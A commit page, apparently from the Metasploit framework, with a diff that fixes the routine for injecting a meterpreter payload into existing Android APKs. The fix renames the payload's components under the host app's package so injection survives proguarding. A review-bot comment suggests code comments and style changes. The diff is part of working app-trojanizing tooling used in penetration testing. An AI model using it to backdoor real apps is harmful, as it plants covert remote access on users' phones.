
Commit daae46d

committed
Fixes rapid7#7552, fix apk injection into proguarded apks
1 parent 6a35b36 commit daae46d


1 file changed

+9
-4
lines changed


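--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -68,7 +68,7 @@ def parse_manifest(manifest_file)
 }
 end
 
-def fix_manifest(tempdir)
+def fix_manifest(tempdir, package)
 #Load payload's manifest
 payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
 payload_permissions = payload_manifest.xpath("//manifest/uses-permission")
@@ -98,8 +98,12 @@ def fix_manifest(tempdir)
 end
 
 application = original_manifest.at_xpath('/manifest/application')
-application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml
-application << payload_manifest.at_xpath('/manifest/application/service').to_xml
+receiver = payload_manifest.at_xpath('/manifest/application/receiver')
+service = payload_manifest.at_xpath('/manifest/application/service')
+receiver.attributes["name"].value = package + receiver.attributes["name"].value
+service.attributes["name"].value = package + service.attributes["name"].value
+application << receiver.to_xml
+application << service.to_xml
 
 File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml }
 end
@@ -207,6 +211,7 @@ def backdoor_apk(apkfile, raw_payload)
 FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
 
 package = amanifest.xpath("//manifest").first['package']
+package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
 package_slash = package.gsub(/\./, "/")
 print_status "Adding payload as package #{package}\n"
 payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
@@ -232,7 +237,7 @@ def backdoor_apk(apkfile, raw_payload)
 injected_apk = "#{tempdir}/output.apk"
 aligned_apk = "#{tempdir}/aligned.apk"
 print_status "Poisoning the manifest with meterpreter permissions..\n"
-fix_manifest(tempdir)
+fix_manifest(tempdir, package)
 
 print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
 run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")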
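Review bot: The two added assignments in fix_manifest (`receiver.attributes["name"].value = package + receiver.attributes["name"].value` and the matching `service` line) build the component name by plain string concatenation, which yields a valid class name only if the names in the payload manifest are relative and begin with a dot; nothing visible checks or documents that assumption. I would put a comment above them, for example `# names in the payload manifest are assumed to be relative (".Name"); prefix them with the package passed in`, and describe the new `package` parameter in a header comment on the method, since the signature changed without any documentation. As a style point on the same commit, `Rex::Text::rand_text_alpha_lower(5)` in backdoor_apk reads more conventionally as `Rex::Text.rand_text_alpha_lower(5)`, and `package = package + ...` as `package += ...`. Part of fix_manifest's body (new lines 75–97) lies outside the hunks shown, so an existing comment there may already cover some of this.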
